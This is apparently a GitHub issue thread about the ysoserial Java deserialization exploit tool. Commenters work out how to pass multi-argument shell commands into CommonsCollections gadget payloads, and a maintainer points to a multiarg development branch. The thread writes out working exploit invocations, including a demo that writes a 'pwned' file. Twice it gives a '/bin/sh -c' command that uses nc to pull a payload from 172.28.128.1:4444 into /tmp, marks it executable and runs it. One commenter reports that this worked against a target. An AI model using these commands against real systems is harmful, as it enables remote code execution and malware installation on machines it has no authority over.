Comments (6)
May I make a suggestion for a temporary solution to #72 that incorporates #60 and #74?
Convert Runtime.exec(String) to Runtime.exec(String[]) with the intention of creating a payload containing platform-specific commands like the following:
- cmd /c "ping ..."
- bash -c "ping ..."
The argument within the parenthesis (ping ...) will be passed into ysoserial using the second command line argument (as usual). All arguments before this will be read from a Java System Property (which can be passed on the command line as such: -Dargname=argval). The value of the property will be read in by the payload class and split into a String array by whitespace. An example execution of ysoserial would be as such:
- java -Dysoserial.prefix="bash -c" -jar ysoserial.jar CommonsCollections1 "ping -c 4 127.0.0.1"
If the expected System Property is not present during payload creation, the input command should instead be split into a String array by whitespace to ensure that the payload will still be generated and will execute on the target system almost identically to a payload containing Runtime.exec(String).
I have included implementations of the above proposed fix in the attached zip file, specifically for CommonsCollections1, CommonsCollections5 and CommonsCollections6 (all in new classes with the names [CLASSNAME]Chained.java). These classes expect a System Property "ysoserial.prefix" to be set on the command line.
from ysoserial.
I needed to run the following "/bin/sh -c 'nc 172.28.128.1 4444 > /tmp/payload; chmod +x /tmp/payload; /tmp/payload'" and tried both your changes.
@frohoff the multiarg branch didn't work... Also, I suggest you don't hardcode bash; some targets might only have sh.
@Bort-Millipede your edited classes worked. I know they are a bit hackish but you saved me a lot of time, thanks!
This should already be supported by the in-development multiargs branch being developed for #74 without any special parameters, by just including the script interpreter "prelude" in the payload command: bash -c '[my bash command]' or cmd /c "my cmd command".
$ echo $$
2
$ java -jar target/ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 \
> bash -c 'echo executed in pid $$ > pwned' \
> | java -cp target/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.Deserializer
$ cat pwned
executed in pid 630
Is there a reason this wouldn't work reasonably well for the scenario you describe?
Your solution would work perfectly well for the scenario I described (and potentially better than the code I posted). I wasn't sure if that multiarg support was still being planned or if it was already being implemented. I just posted my proposed temporary solution in case multiarg support was still on the drawing board. I will check out the multiarg branch, thanks for letting me know about it!
The multiarg branch currently requires multiarg commands be passed without the outermost enclosing quotes so it comes through as multiple arguments in Java's main(String[]), so you'd want to specify the above as:
java -jar ysoserial.jar CommonsCollections6 /bin/sh -c 'nc 172.28.128.1 4444 > /tmp/payload; chmod +x /tmp/payload; /tmp/payload'
This current behavior errs on the side of allowing executables with spaces in the path over preserving backwards compatibility, though this might change in the future.
I'm not aware of bash being hard-coded anywhere.